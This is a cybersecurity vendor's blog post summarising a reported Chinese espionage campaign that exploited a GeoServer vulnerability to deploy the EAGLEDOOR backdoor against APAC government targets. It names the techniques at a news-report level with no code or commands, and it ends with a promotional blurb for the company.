Chinese Hackers Target APAC Governments with EAGLEDOOR Malware Exploiting GeoServer Flaw

Introduction

In a sophisticated cyber espionage campaign, a group of Chinese hackers has exploited a critical vulnerability in GeoServer to target government organizations across the Asia-Pacific (APAC) region. This operation, linked to the advanced persistent threat (APT) group known as Earth Baxia, highlights the evolving landscape of cyber threats facing sensitive sectors, including government and energy.

The Attack: Exploiting GeoServer Vulnerability

The intrusion was identified by cybersecurity experts at Trend Micro in July 2024, who discovered that the hackers leveraged a recently patched vulnerability (CVE-2024-36401) in OSGeo GeoServer GeoTools. With a critical CVSS score of 9.8, this flaw allowed the attackers to gain unauthorized access, marking a significant threat to entities in Taiwan and potentially other APAC nations such as the Philippines, South Korea, Vietnam, and Thailand.

Targeting Key Sectors

The primary targets of this campaign are believed to be government agencies, telecommunication firms, and energy sectors. The use of lure documents in Simplified Chinese indicates that the threat may extend to entities within China as well, although specific sectors have yet to be confirmed.

Multi-Stage Infection Process

The attackers employed a multi-stage infection process, utilizing both spear-phishing emails and the GeoServer vulnerability to deliver sophisticated malware. This includes the notorious Cobalt Strike and a newly identified backdoor named EAGLEDOOR, which enables data gathering and further payload delivery.

Techniques Used

Researchers noted that the attackers utilize advanced techniques, such as GrimResource and AppDomainManager injection methods, to deploy subsequent malware. One notable tactic involved using a decoy MSC file named RIPCOY, embedded in a ZIP attachment, to facilitate the download of additional malicious payloads.

EAGLEDOOR Malware: A Deeper Look

EAGLEDOOR, the malware developed for this campaign, boasts multiple communication methods with the command-and-control (C2) server, including DNS, HTTP, TCP, and Telegram. This versatility allows the attackers to transmit victim status updates, as well as upload and download files, leveraging the Telegram Bot API for seamless operations. Stolen data is exfiltrated using curl.exe, indicating a well-organized approach to information theft.

Connections to Other Threat Actors

Interestingly, this attack bears similarities to another operation linked to APT41, which also targeted Taiwanese and Vietnamese military and energy sectors. The overlap in techniques, particularly the use of Cobalt Strike C2 domains mimicking legitimate cloud services, suggests a collaborative or parallel effort among cybercriminals operating in the region.

Conclusion

The Earth Baxia campaign underscores the critical need for enhanced security measures in the face of growing cyber threats targeting sensitive government and energy sectors across APAC nations. Organizations must prioritize stolen credentials detection, invest in darknet monitoring services, and implement comprehensive digital footprint analysis to defend against brand impersonation and evaluate online risks. As the digital landscape continues to evolve, proactive cybersecurity strategies are essential to protect against increasingly sophisticated attacks like those orchestrated by Earth Baxia.

By adopting a multi-layered approach to security and utilizing effective brand protection strategies, organizations can mitigate the risks posed by these digital threats.

About Foresiet!

Foresiet is the pioneering force in digital security solutions, offering the first integrated Digital Risk Protection SaaS platform. With 24x7x365 dark web monitoring and proactive threat intelligence, Foresiet safeguards against data breaches and intellectual property theft. Our robust suite includes brand protection, takedown services, and supply chain assessment, enhancing your organization's defense mechanisms. Attack surface management is a key component of our approach, ensuring comprehensive protection across all vulnerable points. Compliance is assured through adherence to ISO27001, NIST, GDPR, PCI, SOX, HIPAA, SAMA, CITC, and Third Party regulations. Additionally, our advanced antiphishing shield provides unparalleled protection against malicious emails. Trust Foresiet to empower your organization to navigate the digital landscape securely and confidently.